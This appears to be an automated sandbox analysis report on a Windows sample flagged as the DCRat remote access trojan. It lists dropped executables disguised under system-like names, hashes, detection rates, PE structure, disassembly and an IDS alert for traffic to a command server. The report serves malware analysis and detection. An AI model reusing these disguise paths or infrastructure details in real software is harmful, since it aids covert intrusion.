Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\21b1a557fd31cc

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	277
Entropy (8bit):	5.803805483410547
Encrypted:	false
SSDEEP:	6:e2IVpS08he/TBSO9LWFTOc6/wSjdO9Z2vb3W+qW+lgIBzzIBX:e2InV8G9VWpl0wQV3qDyGkBX
MD5:	4EEABDB16B3305BCEF45976BAF2D7CF6
SHA1:	543064F2D2BA416248E5D0DB7E472979BF855B96
SHA-256:	0F7EF82510DC9D388B445353D8F42A53FBAEE4CF7B6E59DF6137F4EF8D4BF5C3
SHA-512:	7BEA6C7800F03A8B0231787013F5DDF0DF2B54661570EDC10ECFE90A2AF4BB1CCB215E9D0F8651047FA32179271EBA384CCC757D62A71E88D46DB72A5CD2081B
Malicious:	false
Preview:	hB19qI2vfNeUSVnt8SNK0PLPsQMm9ixSsRMK77ts1Ftl0oot2jbQL4aRzmQa5Qv7ZMlBIdwBjeSugkZElduaGhHy05UUqTxlTvLoDmkYxarqlpuONMybfV02EwKNIbVQrravZvA82Wnq0bNLLGHdeVF84SjQcXPVEa83O9zcLziJsKCni9CCU2vWmc0GLugfGRmZcU6LQoRpw6PuQ6rcVNBMpmRwIsRbSDDbinKOC0vpkGjqMG0OCEJ3PZu0DKDiW0Wt2yLmwdZfbVmiCljB2

C:\Recovery\dasHost.exe

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847872
Entropy (8bit):	6.0854906854128545
Encrypted:	false
SSDEEP:	12288:APwJ9nE3RrtCPdRUpg6w/nUc+mQozYhUZObmlVxQbq5K8nMq7:l9E3RrEdapg6gnUcKnbXq5Qc
MD5:	2EFFCBFE83A6E643D620BD7221B8D4CC
SHA1:	37BA35E898BC1135C3BE15127D1BAF95EA311029
SHA-256:	4618A1F497B813EF1F58A9A256BBD0F418C70EC7340CE9E0A51E343D21095B40
SHA-512:	0DCC2FEBDF5AD2C5F5BDA5680BDE51B23EA5D5EA38BDC6BC8DDA0D2F0A0AE9C4A619B9A7AABD024DA9C45F4DF594766D400ABD4DF07EE30FC4A2869DA77D6999
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtimemonitor.exe.log

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.36827240602657
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
MD5:	B28E0CCD25623D173B2EB29F3A99B9DD
SHA1:	070E4C4A7F903505259E41AFDF7873C31F90D591
SHA-256:	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
SHA-512:	17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dasHost.exe.log

Download File

Process:	C:\Recovery\dasHost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ihpxTeRPVLYTpFZNVeq.exe.log

Download File

Process:	C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Windows\appcompat\encapsulation\ca1d63bd2d464f

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	ASCII text, with very long lines (847), with no line terminators
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.906354040947916
Encrypted:	false
SSDEEP:	24:4w769Zqd1a2MbtrMjK6tzRrOISYHHH4Sz:H7wqza201MjjFRaISGHD
MD5:	EABCAFE368E177DD4B45D832EED9E4FA
SHA1:	70621143941E8285E484E1F38D11A43C181A07E0
SHA-256:	450591CE3E203EFE56E509BB7D9A10B55B559BB479FB7C9859FC741F485F7124
SHA-512:	3CAF7F2F960A945C35497CAF842C0714C9E8B28E49EECFF953E00C36881B75422C7CE7DF56DABBF1621EB3C65B9629EBD63717E33108B114FE0BA0192CED9975
Malicious:	false
Preview:	feQrb1MtQjsBwzkVYe0vvuJKZwWapy84nBVfSxEam1ReItwcymBgcrFuUFRpewDbkyXudFClaZJ3cpCq94lDwcb56kKMgY50yz3TVC8tjaFDiMSoDlqkK9pIWcy24zEBdSEmvsU651eVWYWuSfJ5sVqyKv73OFztWEjQHq3VQtoSfTv8FDkYqITImPbAvbszCu9SzGmmmxp8qXT199xKfaCNuan1O3kyBzQvTdI8a8w2dVcP6kAwniUlrwhYcvXsN061Ghhg0ythoJtZ8Y4n3xLcepDh5tgpkDpnYkIZDd5zyx6hCIZE1uzZpdWbdAlGSE6leGAXQfkZ2WorsgewTby0NP84Oq5C2ygu0VC6ICxVJahTzps7gyw0PGXPIGJkjhhDz30XdhoRocqxroEi77gDCpfu7xyC2Nvm2dd6yVe8KeMxZjhdBkmmBdBKYGZptmZaqE4OLIumdh3hdsUYPVARkJkZcTis5yPhFvGVoTS30AIejeqqvBaYlIzgefw1jBqoRVcrl9t5CHbkBGz7m274Y1675j1JhaTyUeMOB9EvSeVdrPfXqyPrEvQaZfwBIjYmymQg4l5nxLm4gcQqDddtLltiNvygMCmsFspE98dE2l43JW37PG8pGpbM3rSIwZaui3yxwLqE9Y0jr0Z111RGE7maRdLRqVSdLJUPhGKDZ3pry2eCRbQ4HTqlRXgTAYYoGXXigJTvrOrLS5lY8IAOEXV1cs8Kj0DAeAlae6gHHeN3mfTVwHV1YKktCgFxLJM0KqqRUL4Bm2HjJbP7ZmYbeLlUa2X80t67SWs5yBBkNUOgCAjkQIXivuW8EW1bx5K36JRxsUJXkxO

C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847872
Entropy (8bit):	6.0854906854128545
Encrypted:	false
SSDEEP:	12288:APwJ9nE3RrtCPdRUpg6w/nUc+mQozYhUZObmlVxQbq5K8nMq7:l9E3RrEdapg6gnUcKnbXq5Qc
MD5:	2EFFCBFE83A6E643D620BD7221B8D4CC
SHA1:	37BA35E898BC1135C3BE15127D1BAF95EA311029
SHA-256:	4618A1F497B813EF1F58A9A256BBD0F418C70EC7340CE9E0A51E343D21095B40
SHA-512:	0DCC2FEBDF5AD2C5F5BDA5680BDE51B23EA5D5EA38BDC6BC8DDA0D2F0A0AE9C4A619B9A7AABD024DA9C45F4DF594766D400ABD4DF07EE30FC4A2869DA77D6999
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.376952703062076
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QoRXFaE8Xn.exe
File size:	1'164'970 bytes
MD5:	08e95dabb86201eeb98188769e4fcd62
SHA1:	40a819d79a67c7be05f9c0c45ee7558ec58971f9
SHA256:	9bf9efa06f63a21c9893e1acfa2ae7838ab3bdcb7d768ef6304756845395bfb7
SHA512:	7d9b35d175f4a0c90a48c44930e7f8260e4a16821b4c778bc5fcb1d5a220d29d29520f7b1809918eb5e03dfd16a6dfcfac3fcbfd4cebabcdd38776c5508cf722
SSDEEP:	24576:U2G/nvxW3Ww0tE9E3RrEdapg6gnUcKnbXq5Qck:UbA30E9ldapLpkQl
TLSH:	B3454A027E44CE21F0191633C2FF454847B4AC512AA6E72B7EBA376E55123937C1DAEB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F11D4D869D9h
jmp 00007F11D4D863EDh
cmp ecx, dword ptr [0043E668h]
jne 00007F11D4D86565h
ret
jmp 00007F11D4D86B5Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F11D4D792F7h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F11D4D896FDh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F11D4D7928Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F11D4D88E12h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F11D4D86504h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F11D4D88DF5h
int3
jmp 00007F11D4D8AE43h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdfd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0xdfd0	0xe000	f6c0f34fae6331b50a7ad2efc4bfefdb	False	0.6370326450892857	data	6.6367506404157535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x64198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x65cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x66558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x67400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x67868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x68910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6aeb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x6f588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6f358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6f498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6f228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6eef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6ec98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6ff68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x70150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x70320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x704d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x70620	0x446	data	English	United States	0.340036563071298
RT_STRING	0x70a68	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x70bd0	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x70d28	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x70e38	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x70ef8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6ec30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x6f810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T21:02:08.606672+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49704	188.114.96.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 21:02:08.034385920 CET	49704	80	192.168.2.5	188.114.96.3
Jan 7, 2025 21:02:08.039174080 CET	80	49704	188.114.96.3	192.168.2.5
Jan 7, 2025 21:02:08.039232969 CET	49704	80	192.168.2.5	188.114.96.3
Jan 7, 2025 21:02:08.039757967 CET	49704	80	192.168.2.5	188.114.96.3
Jan 7, 2025 21:02:08.044531107 CET	80	49704	188.114.96.3	192.168.2.5
Jan 7, 2025 21:02:08.589891911 CET	80	49704	188.114.96.3	192.168.2.5
Jan 7, 2025 21:02:08.606672049 CET	49704	80	192.168.2.5	188.114.96.3
Jan 7, 2025 21:02:08.611438990 CET	80	49704	188.114.96.3	192.168.2.5
Jan 7, 2025 21:02:08.852709055 CET	80	49704	188.114.96.3	192.168.2.5
Jan 7, 2025 21:02:08.873892069 CET	49704	80	192.168.2.5	188.114.96.3
Jan 7, 2025 21:02:14.476814985 CET	59316	53	192.168.2.5	1.1.1.1
Jan 7, 2025 21:02:14.481643915 CET	53	59316	1.1.1.1	192.168.2.5
Jan 7, 2025 21:02:14.481878996 CET	59316	53	192.168.2.5	1.1.1.1
Jan 7, 2025 21:02:14.486824036 CET	53	59316	1.1.1.1	192.168.2.5
Jan 7, 2025 21:02:14.943711042 CET	59316	53	192.168.2.5	1.1.1.1
Jan 7, 2025 21:02:14.948729038 CET	53	59316	1.1.1.1	192.168.2.5
Jan 7, 2025 21:02:14.949130058 CET	59316	53	192.168.2.5	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 21:02:08.014226913 CET	58495	53	192.168.2.5	1.1.1.1
Jan 7, 2025 21:02:08.027549028 CET	53	58495	1.1.1.1	192.168.2.5
Jan 7, 2025 21:02:14.475939035 CET	53	54415	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
